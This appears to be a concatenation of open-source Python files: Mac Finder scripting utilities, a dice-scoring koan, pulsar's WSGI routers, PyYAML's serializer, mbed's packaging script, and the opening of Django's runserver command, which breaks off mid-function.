if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
#---------------------------------------------------
# Miscellaneous functions
#
def volumelevel(level):
"""set the audio output level, parameter between 0 (silent) and 7 (full blast)"""
finder = _getfinder()
args = {}
attrs = {}
if level < 0:
level = 0
elif level > 7:
level = 7
args['----'] = level
_reply, args, attrs = finder.send("aevt", "stvl", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def OSversion():
"""return the version of the system software"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('ver2'), fr=None)
args['----'] = aeobj_00
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def filesharing():
"""return the current status of filesharing and whether it is starting up or not:
-1 file sharing is off and not starting up
0 file sharing is off and starting up
1 file sharing is on"""
status = -1
finder = _getfinder()
# see if it is on
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('fshr'), fr=None)
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
if args['----'] == 0:
status = -1
else:
status = 1
# is it starting up perchance?
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('fsup'), fr=None)
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
if args['----'] == 1:
status = 0
return status
def movetotrash(path):
"""move the object to the trash"""
fss = Carbon.File.FSSpec(path)
trashfolder = Carbon.Folder.FSFindFolder(fss.as_tuple()[0], 'trsh', 0)
move(path, trashfolder)
def emptytrash():
"""empty the trash"""
finder = _getfinder()
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('trsh'), fr=None)
_reply, args, attrs = finder.send("fndr", "empt", args, attrs)
if 'errn' in args:
raise aetools.Error, aetools.decodeerror(args)
def _test():
import EasyDialogs
print 'Original findertools functionality test...'
print 'Testing launch...'
pathname = EasyDialogs.AskFileForOpen('File to launch:')
if pathname:
result = launch(pathname)
if result:
print 'Result: ', result
print 'Press return-',
sys.stdin.readline()
print 'Testing print...'
pathname = EasyDialogs.AskFileForOpen('File to print:')
if pathname:
result = Print(pathname)
if result:
print 'Result: ', result
print 'Press return-',
sys.stdin.readline()
print 'Testing copy...'
pathname = EasyDialogs.AskFileForOpen('File to copy:')
if pathname:
destdir = EasyDialogs.AskFolder('Destination:')
if destdir:
result = copy(pathname, destdir)
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing move...'
pathname = EasyDialogs.AskFileForOpen('File to move:')
if pathname:
destdir = EasyDialogs.AskFolder('Destination:')
if destdir:
result = move(pathname, destdir)
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing sleep...'
if EasyDialogs.AskYesNoCancel('Sleep?') > 0:
result = sleep()
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing shutdown...'
if EasyDialogs.AskYesNoCancel('Shut down?') > 0:
result = shutdown()
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing restart...'
if EasyDialogs.AskYesNoCancel('Restart?') > 0:
result = restart()
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
def _test2():
print '\nmorefindertools version %s\nTests coming up...' %__version__
import os
import random
# miscellaneous
print '\tfilesharing on?', filesharing() # is file sharing on, off, starting up?
print '\tOS version', OSversion() # the version of the system software
# set the soundvolume in a simple way
print '\tSystem beep volume'
for i in range(0, 7):
volumelevel(i)
MacOS.SysBeep()
# Finder's windows, file location, file attributes
open("@findertoolstest", "w")
f = "@findertoolstest"
reveal(f) # reveal this file in a Finder window
select(f) # select this file
base, file = os.path.split(f)
closewindow(base) # close the window this file is in (opened by reveal)
openwindow(base) # open it again
windowview(base, 1) # set the view by list
label(f, 2) # set the label of this file to something orange
print '\tlabel', label(f) # get the label of this file
# the file location only works in a window with icon view!
print 'Random locations for an icon'
windowview(base, 0) # set the view by icon
windowsize(base, (600, 600))
for i in range(50):
location(f, (random.randint(10, 590), random.randint(10, 590)))
windowsize(base, (200, 400))
    windowview(base, 1) # set the view by name
orgpos = windowposition(base)
print 'Animated window location'
for i in range(10):
pos = (100+i*10, 100+i*10)
windowposition(base, pos)
print '\twindow position', pos
windowposition(base, orgpos) # park it where it was before
print 'Put a comment in file', f, ':'
print '\t', comment(f) # print the Finder comment this file has
s = 'This is a comment no one reads!'
comment(f, s) # set the Finder comment
def _test3():
print 'MacOS9 or better specific functions'
# processes
pr = processes() # return a list of tuples with (active_processname, creatorcode)
print 'Return a list of current active processes:'
for p in pr:
print '\t', p
# get attributes of the first process in the list
print 'Attributes of the first process in the list:'
pinfo = processinfo(pr[0][0])
print '\t', pr[0][0]
print '\t\tmemory partition', pinfo.partition # the memory allocated to this process
    print '\t\tmemory used', pinfo.used # the memory actually used by this process
    print '\t\tis visible', pinfo.visible # is the process visible to the user
    print '\t\tis frontmost', pinfo.frontmost # is the process the frontmost one?
print '\t\thas scripting', pinfo.hasscripting # is the process scriptable?
print '\t\taccepts high level events', pinfo.accepthighlevel # does the process accept high level appleevents?
if __name__ == '__main__':
_test()
_test2()
_test3()
| apache-2.0 |
mayk93/python_koans | python2/koans/about_scoring_project.py | 89 | 2262 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
# Greed is a dice game where you roll up to five dice to accumulate
# points. The following "score" function will be used calculate the
# score of a single roll of the dice.
#
# A greed roll is scored as follows:
#
# * A set of three ones is 1000 points
#
# * A set of three numbers (other than ones) is worth 100 times the
# number. (e.g. three fives is 500 points).
#
# * A one (that is not part of a set of three) is worth 100 points.
#
# * A five (that is not part of a set of three) is worth 50 points.
#
# * Everything else is worth 0 points.
#
#
# Examples:
#
# score([1, 1, 1, 5, 1]) => 1150 points
# score([2, 3, 4, 6, 2]) => 0 points
# score([3, 4, 5, 3, 3]) => 350 points
# score([1, 5, 1, 2, 4]) => 250 points
#
# More scoring examples are given in the tests below:
#
# Your goal is to write the score method.
def score(dice):
# You need to write this method
pass
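# A reference sketch of the rules above (a hypothetical helper, kept separate
# so the koan's score() above stays yours to implement):
def _score_sketch(dice):
    counts = {}
    for die in dice:
        counts[die] = counts.get(die, 0) + 1
    total = 0
    for number, count in counts.items():
        if count >= 3:
            total += 1000 if number == 1 else number * 100
            count -= 3
        if number == 1:
            total += count * 100
        elif number == 5:
            total += count * 50
    return total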
class AboutScoringProject(Koan):
def test_score_of_an_empty_list_is_zero(self):
self.assertEqual(0, score([]))
def test_score_of_a_single_roll_of_5_is_50(self):
self.assertEqual(50, score([5]))
def test_score_of_a_single_roll_of_1_is_100(self):
self.assertEqual(100, score([1]))
def test_score_of_multiple_1s_and_5s_is_the_sum_of_individual_scores(self):
self.assertEqual(300, score([1, 5, 5, 1]))
def test_score_of_single_2s_3s_4s_and_6s_are_zero(self):
self.assertEqual(0, score([2, 3, 4, 6]))
def test_score_of_a_triple_1_is_1000(self):
self.assertEqual(1000, score([1, 1, 1]))
def test_score_of_other_triples_is_100x(self):
self.assertEqual(200, score([2, 2, 2]))
self.assertEqual(300, score([3, 3, 3]))
self.assertEqual(400, score([4, 4, 4]))
self.assertEqual(500, score([5, 5, 5]))
self.assertEqual(600, score([6, 6, 6]))
def test_score_of_mixed_is_sum(self):
self.assertEqual(250, score([2, 5, 2, 2, 3]))
self.assertEqual(550, score([5, 5, 5, 5]))
self.assertEqual(1150, score([1, 1, 1, 5, 1]))
def test_ones_not_left_out(self):
self.assertEqual(300, score([1, 2, 2, 2]))
self.assertEqual(350, score([1, 5, 2, 2, 2]))
| mit |
quantmind/pulsar | pulsar/apps/wsgi/routers.py | 1 | 21405 | import os
import re
import stat
import mimetypes
from collections import OrderedDict
from functools import partial, lru_cache
from email.utils import parsedate_tz, mktime_tz
from pulsar.utils.httpurl import CacheControl
from pulsar.utils.slugify import slugify
from pulsar.utils.security import digest
from pulsar.utils.lib import http_date
from pulsar.api import Http404, MethodNotAllowed
from .route import Route
from .utils import wsgi_request
from .content import Html
def get_roule_methods(attrs):
rule_methods = []
for code, callable in attrs:
if code.startswith('__') or not hasattr(callable, '__call__'):
continue
rule_method = getattr(callable, 'rule_method', None)
if isinstance(rule_method, tuple):
rule_methods.append((code, rule_method))
return sorted(rule_methods, key=lambda x: x[1].order)
def update_args(urlargs, args):
if urlargs:
urlargs.update(args)
return urlargs
return args
def _get_default(parent, name):
if name in parent.defaults:
return getattr(parent, name)
elif parent._parent:
return _get_default(parent._parent, name)
else:
raise AttributeError
class SkipRoute(Exception):
pass
class Handler:
__slots__ = ('router', 'handler', 'urlargs')
def __init__(self, router, handler, urlargs):
self.router = router
self.handler = handler
self.urlargs = urlargs
class RouterParam:
'''A :class:`RouterParam` is a way to flag a :class:`Router` parameter
so that children can inherit the value if they don't define their own.
A :class:`RouterParam` is always defined as a class attribute and it
is processed by the :class:`Router` metaclass and stored in a dictionary
available as ``parameter`` class attribute.
.. attribute:: value
The value associated with this :class:`RouterParam`. This is the value
stored in the :class:`Router.parameters` dictionary at key given by
the class attribute specified in the class definition.
'''
def __init__(self, value=None):
self.value = value
class RouterType(type):
''':class:`Router` metaclass.'''
def __new__(cls, name, bases, attrs):
rule_methods = get_roule_methods(attrs.items())
defaults = {}
for key, value in list(attrs.items()):
if isinstance(value, RouterParam):
defaults[key] = attrs.pop(key).value
no_rule = set(attrs) - set((x[0] for x in rule_methods))
base_rules = []
for base in reversed(bases):
if hasattr(base, 'defaults'):
params = base.defaults.copy()
params.update(defaults)
defaults = params
if hasattr(base, 'rule_methods'):
items = base.rule_methods.items()
else:
g = ((key, getattr(base, key)) for key in dir(base))
items = get_roule_methods(g)
rules = [pair for pair in items if pair[0] not in no_rule]
base_rules = base_rules + rules
if base_rules:
all = base_rules + rule_methods
rule_methods = {}
for namerule, rule in all:
if namerule in rule_methods:
rule = rule.override(rule_methods[namerule])
rule_methods[namerule] = rule
rule_methods = sorted(rule_methods.items(),
key=lambda x: x[1].order)
attrs['rule_methods'] = OrderedDict(rule_methods)
attrs['defaults'] = defaults
return super().__new__(cls, name, bases, attrs)
class Router(metaclass=RouterType):
'''A :ref:`WSGI middleware <wsgi-middleware>` to handle client requests
on multiple :ref:`routes <apps-wsgi-route>`.
The user must implement the HTTP methods
required by the application. For example if the route needs to
serve a ``GET`` request, the ``get(self, request)`` method must
be implemented.
:param rule: String used for creating the :attr:`route` of this
:class:`Router`.
:param routes: Optional :class:`Router` instances which are added to the
children :attr:`routes` of this router.
:param parameters: Optional parameters for this router.
.. attribute:: rule_methods
A class attribute built during class creation. It is an ordered
dictionary mapping method names with a five-elements tuple
containing information
about a child route (See the :class:`.route` decorator).
.. attribute:: routes
List of children :class:`Router` of this :class:`Router`.
.. attribute:: parent
The parent :class:`Router` of this :class:`Router`.
.. attribute:: response_content_types
A list/tuple of possible content types of a response to a
client request.
The client request must accept at least one of the response content
types, otherwise an HTTP ``415`` exception occurs.
.. attribute:: response_wrapper
Optional function which wraps all handlers of this :class:`.Router`.
The function must accept two parameters, the original handler
and the :class:`.WsgiRequest`::
def response_wrapper(handler, request):
...
return handler(request)
'''
_creation_count = 0
_parent = None
name = None
SkipRoute = SkipRoute
response_content_types = RouterParam(None)
response_wrapper = RouterParam(None)
def __init__(self, rule, *routes, **parameters):
Router._creation_count += 1
self._creation_count = Router._creation_count
if not isinstance(rule, Route):
rule = Route(rule)
self._route = rule
parameters.setdefault('name', rule.name or self.name or '')
self._set_params(parameters)
self.routes = []
# add routes specified via the initialiser first
for router in routes:
self.add_child(router)
for name, rule_method in self.rule_methods.items():
rule, method, params, _, _ = rule_method
rparameters = params.copy()
handler = getattr(self, name)
self.add_child(self.make_router(rule, method=method,
handler=handler, **rparameters))
def router(self, rule, methods=['get']):
'''Map a function to :class:`Router` and add to the :attr:`routes` list.
Typical usage::
app = Router('/')
@app.router('/hello', methods=['post'])
def world(request):
return wsgi.WsgiResponse(200, 'world')
'''
def handler(fn):
for method in methods:
self.add_child(
self.make_router(rule, method.lower(), fn,
name=fn.__name__))
return fn
return handler
@property
def route(self):
'''The relative :class:`.Route` served by this
:class:`Router`.
'''
parent = self._parent
if parent and parent._route.is_leaf:
return parent.route + self._route
else:
return self._route
@property
def full_route(self):
'''The full :attr:`route` for this :class:`.Router`.
It includes the :attr:`parent` portion of the route if a parent
router is available.
'''
if self._parent:
return self._parent.full_route + self._route
else:
return self._route
@property
def root(self):
'''The root :class:`Router` for this :class:`Router`.'''
if self.parent:
return self.parent.root
else:
return self
@property
def parent(self):
return self._parent
@property
def creation_count(self):
'''Integer for sorting :class:`Router` by creation.
Auto-generated during initialisation.'''
return self._creation_count
@property
def rule(self):
'''The full ``rule`` string for this :class:`Router`.
It includes the :attr:`parent` portion of the rule if a :attr:`parent`
router is available.
'''
return self.full_route.rule
def path(self, **urlargs):
'''The full path of this :class:`Router`.
It includes the :attr:`parent` portion of url if a parent router
is available.
'''
return self.full_route.url(**urlargs)
def getparam(self, name, default=None, parents=False):
'''A parameter in this :class:`.Router`
'''
value = getattr(self, name, None)
if value is None:
if parents and self._parent:
return self._parent.getparam(name, default, parents)
else:
return default
else:
return value
def __getattr__(self, name):
'''Get the value of the ``name`` attribute.
If the ``name`` is not available, retrieve it from the
:attr:`parent` :class:`Router` if it exists.
'''
available = False
value = None
if name in self.defaults:
available = True
value = self.defaults[name]
if self._parent and value is None:
try:
return _get_default(self._parent, name)
except AttributeError:
pass
if available:
return value
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, name))
def __repr__(self):
return self.full_route.__repr__()
def __call__(self, environ, start_response=None):
hnd = self.resolve(environ['PATH_INFO'] or '/',
environ['REQUEST_METHOD'])
if hnd:
try:
request = wsgi_request(environ, hnd.router, hnd.urlargs)
return hnd.handler(request)
except self.SkipRoute:
pass
@lru_cache(maxsize=1024)
def resolve(self, url, method):
return self._resolve(url[1:], method.lower())
def _resolve(self, path, method, urlargs=None):
        '''Resolve a path and return a :class:`Handler` instance, or
        ``None`` if the path could not be resolved.
        '''
match = self.route.match(path)
if match is None:
if not self.route.is_leaf: # no match
return
elif '__remaining__' in match:
path = match.pop('__remaining__')
urlargs = update_args(urlargs, match)
else:
handler = getattr(self, method, None)
if handler is None:
raise MethodNotAllowed
response_wrapper = self.response_wrapper
if response_wrapper:
handler = partial(response_wrapper, handler)
return Handler(self, handler, update_args(urlargs, match))
#
for handler in self.routes:
view_args = handler._resolve(path, method, urlargs)
if view_args is None:
continue
return view_args
def add_route(self, router, index=None):
'''Add a new :class:`Router` to the :attr:`routes` list.
'''
assert isinstance(router, Router), 'Not a valid Router'
assert router is not self, 'cannot add self to children'
for r in self.routes:
if r == router:
return r
elif r._route == router._route:
                raise ValueError('Cannot add route %s. Already available' %
r._route)
#
# Remove from previous parent
if router.parent:
router.parent.remove_child(router)
router._parent = self
if index is None:
self.routes.append(router)
else:
self.routes.insert(index, router)
return router
add_child = add_route
def remove_child(self, router):
'''remove a :class:`Router` from the :attr:`routes` list.'''
if router in self.routes:
self.routes.remove(router)
router._parent = None
def get_route(self, name):
'''Get a child :class:`Router` by its :attr:`name`.
This method search child routes recursively.
'''
for route in self.routes:
if route.name == name:
return route
for child in self.routes:
route = child.get_route(name)
if route:
return route
def link(self, *args, **urlargs):
'''Return an anchor :class:`Html` element with the `href` attribute
set to the url of this :class:`Router`.'''
if len(args) > 1:
raise ValueError
url = self.route.url(**urlargs)
if len(args) == 1:
text = args[0]
else:
text = url
return Html('a', text, href=url)
def has_parent(self, router):
        '''Check if ``router`` is ``self`` or a parent of ``self``
'''
parent = self
while parent and parent is not router:
parent = parent._parent
return parent is not None
def make_router(self, rule, method=None, handler=None, cls=None,
name=None, **params):
'''Create a new :class:`.Router` from a ``rule`` and parameters.
This method is used during initialisation when building child
Routers from the :attr:`rule_methods`.
'''
cls = cls or Router
router = cls(rule, name=name, **params)
for r in self.routes:
if r._route == router._route:
if isinstance(r, cls):
router = r
router._set_params(params)
break
if method and handler:
if isinstance(method, tuple):
for m in method:
setattr(router, m, handler)
else:
setattr(router, method, handler)
return router
# INTERNALS
def _set_params(self, parameters):
for name, value in parameters.items():
if name not in self.defaults:
name = slugify(name, separator='_')
setattr(self, name, value)
class MediaMixin:
cache_control = CacheControl(maxage=86400)
def serve_file(self, request, fullpath, status_code=None):
return file_response(request, fullpath, status_code=status_code,
cache_control=self.cache_control)
def directory_index(self, request, fullpath):
names = [Html('a', '../', href='../', cn='folder')]
files = []
for f in sorted(os.listdir(fullpath)):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
names.append(Html('a', f, href=f+'/', cn='folder'))
else:
files.append(Html('a', f, href=f))
names.extend(files)
return self.static_index(request, names)
def static_index(self, request, links):
doc = request.html_document
doc.title = 'Index of %s' % request.path
title = Html('h2', doc.title)
list = Html('ul', *[Html('li', a) for a in links])
doc.body.append(Html('div', title, list))
return doc.http_response(request)
class MediaRouter(Router, MediaMixin):
'''A :class:`Router` for serving static media files from a given
directory.
    :param rule: The top-level url for this router. For example ``/media``
will serve the ``/media/<path:path>`` :class:`Route`.
:param path: Check the :attr:`path` attribute.
:param show_indexes: Check the :attr:`show_indexes` attribute.
.. attribute:: path
The file-system path of the media files to serve.
.. attribute:: show_indexes
If ``True``, the router will serve media file directories as
well as media files.
.. attribute:: serve_only
        File suffixes to be served. When specified, this is a set of suffixes
        (jpeg, png, json for example) which are served by this router;
        if a file does not match one of these suffixes it won't be served and
        the router returns nothing, so that other routers can process the url.
.. attribute:: default_file
The default file to serve when a directory is requested.
'''
def __init__(self, rule, path=None, show_indexes=False,
default_suffix=None, default_file='index.html',
serve_only=None, **params):
super().__init__('%s/<path:path>' % rule, **params)
self._serve_only = set(serve_only or ())
self._default_suffix = default_suffix
self._default_file = default_file
self._show_indexes = show_indexes
self._file_path = path or ''
def filesystem_path(self, request):
return self.get_full_path(request.urlargs['path'])
def get_full_path(self, path):
bits = [bit for bit in path.split('/') if bit]
return os.path.join(self._file_path, *bits)
def get(self, request):
if self._serve_only:
suffix = request.urlargs.get('path', '').split('.')[-1]
if suffix not in self._serve_only:
raise self.SkipRoute
fullpath = self.filesystem_path(request)
if not self._serve_only:
if os.path.isdir(fullpath) and self._default_file:
file = os.path.join(fullpath, self._default_file)
if os.path.isfile(file):
if not request.path.endswith('/'):
return request.redirect('%s/' % request.path)
fullpath = file
#
# Check for missing suffix
if self._default_suffix:
ext = '.%s' % self._default_suffix
if not fullpath.endswith(ext):
file = '%s%s' % (fullpath, ext)
if os.path.isfile(file):
fullpath = file
if os.path.isdir(fullpath):
if self._show_indexes:
return self.directory_index(request, fullpath)
else:
raise Http404
#
try:
return self.serve_file(request, fullpath)
except Http404:
file404 = self.get_full_path('404.html')
if os.path.isfile(file404):
return self.serve_file(request, file404, status_code=404)
else:
raise
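# A minimal usage sketch (paths are hypothetical): serve files from a local
# "./public" directory at "/static", listing directories on request, as part
# of a pulsar WSGI handler:
#
#   media = MediaRouter('/static', path='./public', show_indexes=True)
#   app = wsgi.WsgiHandler([media])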
def modified_since(header, size=0):
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$",
header,
re.IGNORECASE)
header_mtime = mktime_tz(parsedate_tz(matches.group(1)))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
return header_mtime
except (AttributeError, ValueError, OverflowError):
pass
def was_modified_since(header=None, mtime=0, size=0):
'''Check if an item was modified since the user last downloaded it
:param header: the value of the ``If-Modified-Since`` header.
If this is ``None``, simply return ``True``
:param mtime: the modification time of the item in question.
:param size: the size of the item.
'''
header_mtime = modified_since(header, size)
if header_mtime and header_mtime <= mtime:
return False
return True
def file_response(request, filepath, block=None, status_code=None,
content_type=None, encoding=None, cache_control=None):
"""Utility for serving a local file
Typical usage::
from pulsar.apps import wsgi
class MyRouter(wsgi.Router):
def get(self, request):
return wsgi.file_response(request, "<filepath>")
:param request: Wsgi request
:param filepath: full path of file to serve
:param block: Optional block size (default 1MB)
:param status_code: Optional status code (default 200)
:return: a :class:`~.WsgiResponse` object
"""
file_wrapper = request.get('wsgi.file_wrapper')
if os.path.isfile(filepath):
response = request.response
info = os.stat(filepath)
size = info[stat.ST_SIZE]
modified = info[stat.ST_MTIME]
header = request.get('HTTP_IF_MODIFIED_SINCE')
if not was_modified_since(header, modified, size):
response.status_code = 304
else:
if not content_type:
content_type, encoding = mimetypes.guess_type(filepath)
file = open(filepath, 'rb')
response.headers['content-length'] = str(size)
response.content = file_wrapper(file, block)
response.content_type = content_type
response.encoding = encoding
if status_code:
response.status_code = status_code
else:
response.headers["Last-Modified"] = http_date(modified)
if cache_control:
etag = digest('modified: %d - size: %d' % (modified, size))
cache_control(response.headers, etag=etag)
return response
raise Http404
| bsd-3-clause |
nimzco/Environment | Sublime/Packages/pyyaml/st3/yaml/serializer.py | 293 | 4165 |
__all__ = ['Serializer', 'SerializerError']
from .error import YAMLError
from .events import *
from .nodes import *
class SerializerError(YAMLError):
pass
class Serializer:
ANCHOR_TEMPLATE = 'id%03d'
def __init__(self, encoding=None,
explicit_start=None, explicit_end=None, version=None, tags=None):
self.use_encoding = encoding
self.use_explicit_start = explicit_start
self.use_explicit_end = explicit_end
self.use_version = version
self.use_tags = tags
self.serialized_nodes = {}
self.anchors = {}
self.last_anchor_id = 0
self.closed = None
def open(self):
if self.closed is None:
self.emit(StreamStartEvent(encoding=self.use_encoding))
self.closed = False
elif self.closed:
raise SerializerError("serializer is closed")
else:
raise SerializerError("serializer is already opened")
def close(self):
if self.closed is None:
raise SerializerError("serializer is not opened")
elif not self.closed:
self.emit(StreamEndEvent())
self.closed = True
#def __del__(self):
# self.close()
def serialize(self, node):
if self.closed is None:
raise SerializerError("serializer is not opened")
elif self.closed:
raise SerializerError("serializer is closed")
self.emit(DocumentStartEvent(explicit=self.use_explicit_start,
version=self.use_version, tags=self.use_tags))
self.anchor_node(node)
self.serialize_node(node, None, None)
self.emit(DocumentEndEvent(explicit=self.use_explicit_end))
self.serialized_nodes = {}
self.anchors = {}
self.last_anchor_id = 0
def anchor_node(self, node):
if node in self.anchors:
if self.anchors[node] is None:
self.anchors[node] = self.generate_anchor(node)
else:
self.anchors[node] = None
if isinstance(node, SequenceNode):
for item in node.value:
self.anchor_node(item)
elif isinstance(node, MappingNode):
for key, value in node.value:
self.anchor_node(key)
self.anchor_node(value)
def generate_anchor(self, node):
self.last_anchor_id += 1
return self.ANCHOR_TEMPLATE % self.last_anchor_id
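    # A hedged illustration of the anchor pass above: only nodes visited
    # twice receive an anchor, so a shared object round-trips through the
    # high-level API (which drives this serializer) as ``&id001``/``*id001``:
    #
    #   import yaml
    #   shared = [1, 2]
    #   print(yaml.dump({'a': shared, 'b': shared}, default_flow_style=False))
    #   # a: &id001
    #   # - 1
    #   # - 2
    #   # b: *id001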
def serialize_node(self, node, parent, index):
alias = self.anchors[node]
if node in self.serialized_nodes:
self.emit(AliasEvent(alias))
else:
self.serialized_nodes[node] = True
self.descend_resolver(parent, index)
if isinstance(node, ScalarNode):
detected_tag = self.resolve(ScalarNode, node.value, (True, False))
default_tag = self.resolve(ScalarNode, node.value, (False, True))
implicit = (node.tag == detected_tag), (node.tag == default_tag)
self.emit(ScalarEvent(alias, node.tag, implicit, node.value,
style=node.style))
elif isinstance(node, SequenceNode):
implicit = (node.tag
== self.resolve(SequenceNode, node.value, True))
self.emit(SequenceStartEvent(alias, node.tag, implicit,
flow_style=node.flow_style))
index = 0
for item in node.value:
self.serialize_node(item, node, index)
index += 1
self.emit(SequenceEndEvent())
elif isinstance(node, MappingNode):
implicit = (node.tag
== self.resolve(MappingNode, node.value, True))
self.emit(MappingStartEvent(alias, node.tag, implicit,
flow_style=node.flow_style))
for key, value in node.value:
self.serialize_node(key, node, None)
self.serialize_node(value, node, key)
self.emit(MappingEndEvent())
self.ascend_resolver()
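    # A minimal round trip through PyYAML's public helpers (hedged sketch):
    # ``yaml.serialize`` drives open()/serialize()/close() on a dumper that
    # mixes in this class:
    #
    #   import yaml
    #   node = yaml.compose('a: [1, 2]')   # parse into a node graph
    #   text = yaml.serialize(node)        # emit the node graph back as YAML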
| mit |
al177/mbed | setup.py | 44 | 1751 | """
This module defines the attributes of the
PyPI package for the Mbed SDK
"""
from shutil import copyfileobj
from os.path import isfile, join
from tempfile import TemporaryFile
from setuptools import find_packages
from distutils.core import setup
LICENSE = open('LICENSE').read()
DESCRIPTION = """A set of Python scripts that can be used to compile programs written on top of the `mbed framework`_. It can also be used to export mbed projects to other build systems and IDEs (uVision, IAR, makefiles).
.. _mbed framework: http://mbed.org"""
OWNER_NAMES = 'emilmont, bogdanm'
OWNER_EMAILS = 'Emilio.Monti@arm.com, Bogdan.Marinescu@arm.com'
# If private_settings.py exists in workspace_tools, read it in a temporary file
# so it can be restored later
private_settings = join('workspace_tools', 'private_settings.py')
backup = None
if isfile(private_settings):
backup = TemporaryFile()
with open(private_settings, "rb") as f:
copyfileobj(f, backup)
# Create the correct private_settings.py for the distribution
with open(private_settings, "wt") as f:
f.write("from mbed_settings import *\n")
setup(name='mbed-tools',
version='0.1.14',
description='Build and test system for mbed',
long_description=DESCRIPTION,
author=OWNER_NAMES,
author_email=OWNER_EMAILS,
maintainer=OWNER_NAMES,
maintainer_email=OWNER_EMAILS,
url='https://github.com/mbedmicro/mbed',
packages=find_packages(),
license=LICENSE,
install_requires=["PrettyTable>=0.7.2", "PySerial>=2.7", "IntelHex>=1.3", "colorama>=0.3.3", "Jinja2>=2.7.3"])
# Restore previous private_settings if needed
if backup:
backup.seek(0)
with open(private_settings, "wb") as f:
copyfileobj(backup, f)
| apache-2.0 |
yamila-moreno/django | django/core/management/commands/runserver.py | 140 | 7204 | from __future__ import unicode_literals
import errno
import os
import re
import socket
import sys
from datetime import datetime
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand, CommandError
from django.core.servers.basehttp import get_internal_wsgi_application, run
from django.db import DEFAULT_DB_ALIAS, connections
from django.db.migrations.exceptions import MigrationSchemaMissing
from django.db.migrations.executor import MigrationExecutor
from django.utils import autoreload, six
from django.utils.encoding import force_text, get_system_encoding
naiveip_re = re.compile(r"""^(?:
(?P<addr>
(?P<ipv4>\d{1,3}(?:\.\d{1,3}){3}) | # IPv4 address
(?P<ipv6>\[[a-fA-F0-9:]+\]) | # IPv6 address
(?P<fqdn>[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*) # FQDN
):)?(?P<port>\d+)$""", re.X)
class Command(BaseCommand):
help = "Starts a lightweight Web server for development."
# Validation is called explicitly each time the server is reloaded.
requires_system_checks = False
leave_locale_alone = True
default_port = '8000'
def add_arguments(self, parser):
parser.add_argument('addrport', nargs='?',
help='Optional port number, or ipaddr:port')
parser.add_argument('--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use an IPv6 address.')
parser.add_argument('--nothreading', action='store_false', dest='use_threading', default=True,
help='Tells Django to NOT use threading.')
parser.add_argument('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.')
def execute(self, *args, **options):
if options.get('no_color'):
# We rely on the environment because it's currently the only
# way to reach WSGIRequestHandler. This seems an acceptable
# compromise considering `runserver` runs indefinitely.
os.environ[str("DJANGO_COLORS")] = str("nocolor")
super(Command, self).execute(*args, **options)
def get_handler(self, *args, **options):
"""
Returns the default WSGI handler for the runner.
"""
return get_internal_wsgi_application()
def handle(self, *args, **options):
from django.conf import settings
if not settings.DEBUG and not settings.ALLOWED_HOSTS:
raise CommandError('You must set settings.ALLOWED_HOSTS if DEBUG is False.')
self.use_ipv6 = options.get('use_ipv6')
if self.use_ipv6 and not socket.has_ipv6:
raise CommandError('Your Python does not support IPv6.')
self._raw_ipv6 = False
if not options.get('addrport'):
self.addr = ''
self.port = self.default_port
else:
m = re.match(naiveip_re, options['addrport'])
if m is None:
raise CommandError('"%s" is not a valid port number '
'or address:port pair.' % options['addrport'])
self.addr, _ipv4, _ipv6, _fqdn, self.port = m.groups()
if not self.port.isdigit():
raise CommandError("%r is not a valid port number." % self.port)
if self.addr:
if _ipv6:
self.addr = self.addr[1:-1]
self.use_ipv6 = True
self._raw_ipv6 = True
elif self.use_ipv6 and not _fqdn:
raise CommandError('"%s" is not a valid IPv6 address.' % self.addr)
if not self.addr:
self.addr = '::1' if self.use_ipv6 else '127.0.0.1'
self._raw_ipv6 = bool(self.use_ipv6)
self.run(**options)
def run(self, **options):
"""
Runs the server, using the autoreloader if needed
"""
use_reloader = options.get('use_reloader')
if use_reloader:
autoreload.main(self.inner_run, None, options)
else:
self.inner_run(None, **options)
def inner_run(self, *args, **options):
threading = options.get('use_threading')
shutdown_message = options.get('shutdown_message', '')
quit_command = 'CTRL-BREAK' if sys.platform == 'win32' else 'CONTROL-C'
self.stdout.write("Performing system checks...\n\n")
self.check(display_num_errors=True)
self.check_migrations()
now = datetime.now().strftime('%B %d, %Y - %X')
if six.PY2:
now = now.decode(get_system_encoding())
self.stdout.write(now)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Starting development server at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": '[%s]' % self.addr if self._raw_ipv6 else self.addr,
"port": self.port,
"quit_command": quit_command,
})
try:
handler = self.get_handler(*args, **options)
